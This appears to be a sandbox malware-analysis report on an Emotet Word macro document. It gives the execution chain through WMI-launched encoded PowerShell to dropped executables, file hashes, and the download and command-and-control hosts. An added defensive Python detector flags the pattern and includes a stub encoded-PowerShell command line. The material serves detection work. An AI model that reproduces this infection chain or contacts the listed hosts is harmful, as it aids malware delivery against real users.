File name: vir1.doc
Full analysis: https://app.any.run/tasks/0b99dc61-796d-4913-9f1b-c1b7c6d47b25
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: September 30, 2020, 06:40:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet, trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Odio., Author: Lou Denis, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 23:29:00 2020, Last Saved Time/Date: Tue Sep 29 23:29:00 2020, Number of Pages: 1, Number of Words: 3749, Number of Characters: 21371, Security: 8
MD5: 7D23CB8063CCD89D7CE68FB639696051
SHA1: EE908749853CC32C6C979463B0F875BB4CFB7EB2
SHA256: F8B2D066F5A3D657EDB1544F9DF31A9A7B3121C5C14DDB1B96B50DDD69B44C22
SSDEEP: 1536:hMRD3bNqfNpu39IId5a6XP3Mg8af2qD9ieW0jnzJ:CR1qf69xak3Mgx2gVjnzJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • T36vmr9l.exe (PID: 3832)
      • KBDFO.exe (PID: 3152)
    • Connects to CnC server
      • KBDFO.exe (PID: 3152)
    • EMOTET was detected
      • KBDFO.exe (PID: 3152)
    • Changes the autorun value in the registry
      • KBDFO.exe (PID: 3152)
  • SUSPICIOUS
    • Creates files in the user directory
      • POwersheLL.exe (PID: 3632)
    • Executed via WMI
      • POwersheLL.exe (PID: 3632)
    • Executable content was dropped or overwritten
      • POwersheLL.exe (PID: 3632)
      • T36vmr9l.exe (PID: 3832)
    • PowerShell script executed
      • POwersheLL.exe (PID: 3632)
    • Reads Internet Cache Settings
      • KBDFO.exe (PID: 3152)
    • Starts itself from another location
      • T36vmr9l.exe (PID: 3832)
  • INFO
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3968)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 25070
Paragraphs: 50
Lines: 178
Company: -
Security: Locked for annotations
Characters: 21371
Words: 3749
Pages: 1
ModifyDate: 2020:09:29 22:29:00
CreateDate: 2020:09:29 22:29:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Lou Denis
Subject: -
Title: Odio.
All screenshots are available in the full report
Total processes: 40
Monitored processes: 4
Malicious processes: 3
Suspicious processes: 0

Behavior graph (process chain): winword.exe (no indicators) -> powershell.exe -> drops and starts t36vmr9l.exe -> drops and starts kbdfo.exe (#EMOTET). The interactive graph is available in the full report.

Process information

PID: 3968
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\vir1.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 3632
CMD: POwersheLL -ENCOD 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3832
CMD: "C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe"
Path: C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe
Parent process: POwersheLL.exe
User: admin
Company: Flex Inc.
Integrity Level: MEDIUM
Description: Replacement for the Masked Edit Control v 2.0.
Exit code: 0
Version: 2.8.0.3

PID: 3152
CMD: "C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe"
Path: C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe
Parent process: T36vmr9l.exe
User: admin
Company: Flex Inc.
Integrity Level: MEDIUM
Description: Replacement for the Masked Edit Control v 2.0.
Version: 2.8.0.3
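The process table above shows the two things a detection engineer should take from this run: the encoded PowerShell (PID 3632) is a child of wmiprvse.exe, not of WINWORD.EXE, so a rule that only looks for "Office spawns PowerShell" never fires on this chain (the "Executed via WMI" indicator is exactly that parent-process break); and the second-stage binary runs once from the user profile (PID 3832) and then again from AppData\Local\systemcpl (PID 3152) with the same hash, which is the "Starts itself from another location" indicator. The following is an added example, not ANY.RUN's code or schema: it correlates a constructed list of process records, built from the PIDs, paths, parents and the KBDFO.exe SHA256 shown in this report, with assumed timestamps, an assumed explorer.exe/wmiprvse.exe PID and a constructed Base64 argument standing in for the removed encoded command. It generalizes the PowerShell check to every abbreviation of -EncodedCommand that PowerShell accepts.

```python
"""Correlate sandbox process records into the Emotet maldoc chain (added example)."""
from dataclasses import dataclass
from typing import List

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}


@dataclass
class Proc:
    pid: int
    image: str          # full path of the executable image
    cmdline: str
    parent_pid: int
    start: float        # seconds relative to the document open (constructed)
    sha256: str = ""    # hash of the image; empty where the report gives none


def name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_encoded_flag(tok: str) -> bool:
    """PowerShell resolves any unambiguous prefix of -EncodedCommand, plus the
    documented short forms -e and -ec, so the case-mangled -ENCOD seen in this
    report is just another spelling of the same switch."""
    t = tok.lower()
    return t in ("-e", "-ec") or (len(t) >= 3 and "-encodedcommand".startswith(t))


def has_encoded_command(cmdline: str) -> bool:
    return any(is_encoded_flag(tok) for tok in cmdline.split())


def detect(procs: List[Proc], window: float = 120.0) -> List[str]:
    """Return one finding string per matched rule."""
    by_pid = {p.pid: p for p in procs}
    office = [p for p in procs if name(p.image) in OFFICE_IMAGES]
    hits: List[str] = []
    for p in procs:
        parent = by_pid.get(p.parent_pid)
        if name(p.image) == "powershell.exe" and has_encoded_command(p.cmdline):
            if parent and name(parent.image) in OFFICE_IMAGES:
                # Textbook macro chain: Office is the direct parent.
                hits.append(f"office->encoded-powershell pid={p.pid} parent={parent.pid}")
            elif parent and name(parent.image) == "wmiprvse.exe":
                # WMI launch: the Office ancestor is not in the tree, so
                # correlate on time against any Office process that opened a
                # document shortly before.
                near = [o for o in office if 0 <= p.start - o.start <= window]
                if near:
                    hits.append(f"wmi-spawned encoded-powershell pid={p.pid} "
                                f"after office pid={near[0].pid}")
        # Same image hash as the parent but a different path: the binary copied
        # itself elsewhere and relaunched (the report's "Starts itself from
        # another location").
        if (parent and p.sha256 and p.sha256 == parent.sha256
                and p.image.lower() != parent.image.lower()):
            hits.append(f"self-relocation pid={p.pid} {parent.image} -> {p.image}")
    return hits


# SHA256 of both dropped executables, taken from the report's dropped-files list.
KBDFO_SHA256 = "93B60CF27B25A6867C5F01CA9355335B8AC4ECC2260982A50714CD12C47A5D09"

# Constructed records mirroring the report's process table. PIDs 1234 and 2222,
# all timestamps, and the Base64 argument are assumptions, not report data.
SAMPLE = [
    Proc(1234, r"C:\Windows\explorer.exe", "explorer.exe", 1, -10.0),
    Proc(3968, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
         r'"C:\Users\admin\Desktop\vir1.doc"', 1234, 0.0),
    Proc(2222, r"C:\Windows\System32\wbem\wmiprvse.exe", "wmiprvse.exe", 600, 1.0),
    Proc(3632, r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe",
         "POwersheLL -ENCOD QQBCAEMA", 2222, 3.5),
    Proc(3832, r"C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe",
         r'"C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe"', 3632, 20.0, KBDFO_SHA256),
    Proc(3152, r"C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe",
         r'"C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe"', 3832, 25.0, KBDFO_SHA256),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

Run against the constructed records this yields two findings, the WMI-spawned encoded PowerShell correlated to WINWORD.EXE and the T36vmr9l.exe to KBDFO.exe relocation, and no "office->" finding, which is the point: a parent-child rule alone would have scored this tree as clean. The time window is a tuning knob; on a busy endpoint it should be paired with the user/session of the Office process to avoid pairing unrelated documents with unrelated WMI activity.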
Total events: 2 258
Read events: 1 340
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 2
Suspicious files: 2
Text files: 2
Unknown types: 4

Dropped files

PID 3968, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\CVRBEDC.tmp.cvr (type: -)
  MD5: -
  SHA256: -
PID 3632, POwersheLL.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TVEJ4FBOXIPBD2L3IRGY.temp (type: -)
  MD5: -
  SHA256: -
PID 3832, T36vmr9l.exe: C:\Users\admin\AppData\Local\Temp\~DF2F1F7AF9A7C5F030.TMP (type: -)
  MD5: -
  SHA256: -
PID 3968, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\vir1.doc.LNK (type: lnk)
  MD5: B46FA0AD741E5054150FC0012C91AD6B
  SHA256: 9080AE3B131215E88D3AE4E796B52E24D5BA3AE5602B513F1D73658181BDBEB0
PID 3968, WINWORD.EXE: C:\Users\admin\Desktop\~$vir1.doc (type: pgc)
  MD5: AD0A0293B6BDCFE52E47A31D50476B72
  SHA256: 128C82676D7C2EB8AEAC8013448E8027260F4E25C8AFCB62E334E5D5497CFBFD
PID 3832, T36vmr9l.exe: C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe (type: executable)
  MD5: 6B150B90D11ECED71CCCC6FADEC39D43
  SHA256: 93B60CF27B25A6867C5F01CA9355335B8AC4ECC2260982A50714CD12C47A5D09
PID 3968, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd (type: tlb)
  MD5: 1998C7ECDE025FB74624480B97A70378
  SHA256: 13D34FE24069C286B32B8BE371334A48AC41738C8E1D06FEF2DFD88C3A63E466
PID 3632, POwersheLL.exe: C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe (type: executable)
  MD5: 6B150B90D11ECED71CCCC6FADEC39D43
  SHA256: 93B60CF27B25A6867C5F01CA9355335B8AC4ECC2260982A50714CD12C47A5D09
PID 3968, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm (type: pgc)
  MD5: 7BC094E9C2435B309D9E12BE4843CADE
  SHA256: A84E8C2C72D30FE1089DE35B13437C0771EA4BE856662EA8D15A1B0C63F61E3E
PID 3968, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat (type: text)
  MD5: 398DE326941A5E8BA1AEB90ACBF3AD12
  SHA256: AC1D7DBA2E79145B861969922D7A785C40B5C31CDD08DE705DBC8FBA1AAC666B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 2
DNS requests: 1
Threats: 0

HTTP requests

No HTTP requests

Connections

PID   Process         IP:port            Domain                          ASN               CN  Reputation
3632  POwersheLL.exe  68.66.228.11:80    www.productsofindiareviews.com  A2 Hosting, Inc.  US  suspicious
3152  KBDFO.exe       202.22.141.45:80   -                               OFFRATEL          NC  malicious

DNS requests

Domain                          IP            Reputation
www.productsofindiareviews.com  68.66.228.11  suspicious

Threats

PID   Process         Class                                  Message
3632  POwersheLL.exe  Potential Corporate Privacy Violation  ET POLICY PE EXE or DLL Windows file download HTTP
3632  POwersheLL.exe  Potentially Bad Traffic                ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3632  POwersheLL.exe  Misc activity                          ET INFO EXE - Served Attached HTTP
3152  KBDFO.exe       A Network Trojan was detected          ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info